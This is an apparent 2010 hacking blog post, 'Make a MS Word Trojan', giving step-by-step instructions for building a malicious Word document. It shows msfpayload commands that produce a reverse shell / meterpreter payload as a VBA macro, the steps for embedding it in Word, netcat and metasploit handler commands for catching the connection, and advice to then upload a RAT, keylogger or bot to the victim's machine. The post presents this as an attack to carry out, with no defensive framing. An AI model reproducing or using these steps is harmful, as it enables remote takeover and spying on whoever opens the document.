Latest Exploits

Make a MS Word Trojan

, Posted by Sahil™ at 2/09/2010 12:40:00 PM

Anyway this is how you can use metasploit to make a vbs reverse meterpreter payload and import it into a Microsoft Word as a macro. It's super easy.


download and install metasploit
http://www.metasploit.com/

-----------------------------------------------------------------
Ok first we create the payload with msfpayload


Windows:

Start>All Programs>Metasploit 3>CMD Shell
 
ruby msfpayload windows/shell_reverse_tcp LHOST=your_ip LPORT=4444 V > C:\evil.bas

Linux: 

./msfpayload windows/meterpreter/reverse_tcp LHOST=your_ip LPORT=4444 V > evil.bas

-----------------------------------------------------------------

Open up an new word document in word 2003.

Go tools>macro>Visual Basic editor

File>Import File

now select your evil.bas file.

File>Save Normal

File>Close and Return to Microsoft Word

Save it.

-----------------------------------------------------------------

Windows:

Download netcat from here http://webscripts.softpedia.com/script/Networking-Tools/Netcat-27515.html

open up cmd

nc.exe -l -p 4444 -v

Linux:

set up a listener with metasploit

msfconsole

use exploit/multi/handler

set PAYLOAD windows/meterpreter/reverse_tcp

set LPORT 4444

set LHOST your_ip

exploit

-----------------------------------------------------------------
Then open the word document on another pc and you will get a meterpreter session.

You can now use meterpreter's upload and execute commands to upload and run your perfered rat/keylogger/bot on the target machine.
-----------------------------------------------------------------

Bookmark and Share

Currently have 0 comments:

Leave a Reply

Post a Comment